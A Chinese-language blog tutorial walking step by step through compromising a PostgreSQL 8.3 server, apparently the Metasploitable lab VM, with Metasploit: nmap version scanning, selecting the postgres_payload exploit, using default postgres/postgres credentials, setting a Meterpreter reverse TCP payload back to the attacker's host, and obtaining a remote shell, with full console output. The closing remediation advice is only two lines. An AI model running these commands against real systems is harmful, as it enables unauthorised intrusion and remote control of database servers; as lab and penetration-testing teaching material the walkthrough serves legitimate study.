Metasploit实战:postgresql代码执行
2019-07-14 本文已影响57人
DreamsonMa
postgresql介绍
PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL,版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL 可以用许多方法扩展,比如, 通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改、和分发 PostgreSQL,不管是私用、商用、还是学术研究使用。https://www.postgresql.org/
探测目标postgresql
使用 nmap -sV -p 5432 IP地址 探测目标postgresql版本信息。
➜ ~ nmap -sV 10.0.2.5 | grep sql
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
postgresql代码执行利用
利用 msf 下 postgresql的 代码执行获得反弹shell.
1、打开msfconsole控制台
➜ ~ msfconsole
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
2、查找postgresql漏洞利用模块
msf5 > search postgresql
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_dbname_flag_injection normal Yes PostgreSQL Database Name Command Line Flag Injection
auxiliary/scanner/postgres/postgres_login normal Yes PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version normal Yes PostgreSQL Version Probe
auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL
exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
exploit/windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution
post/linux/gather/enum_users_history normal No Linux Gather User History
3、使用exploit/linux/postgres/postgres_payload
msf5 > use exploit/linux/postgres/postgres_payload
msf5 exploit(linux/postgres/postgres_payload) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
4、选择payload
msf5 exploit(linux/postgres/postgres_payload) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
generic/custom normal No Custom Payload
generic/debug_trap normal No Generic x86 Debug Trap
generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal No Generic x86 Tight Loop
linux/x86/chmod normal No Linux Chmod
linux/x86/exec normal No Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
linux/x86/read_file normal No Linux Read File
linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/postgres/postgres_payload) > set lhost 10.0.2.12
lhost => 10.0.2.12
5、检查参数设置
msf5 exploit(linux/postgres/postgres_payload) > show options
Module options (exploit/linux/postgres/postgres_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 5432 yes The target port
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
6、开始渗透攻击
msf5 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 10.0.2.12:4444
[*] 10.0.2.5:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/WaGyEMSt.so, should be cleaned up automatically
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35547) at 2019-07-14 01:28:44 -0400
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > shell
Process 5163 created.
Channel 1 created.
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
提权
防御修复
防御:屏蔽任意IP连接Postgresql
修复:升级版本,安全配置
推荐汇总贴: 漏洞利用套路汇总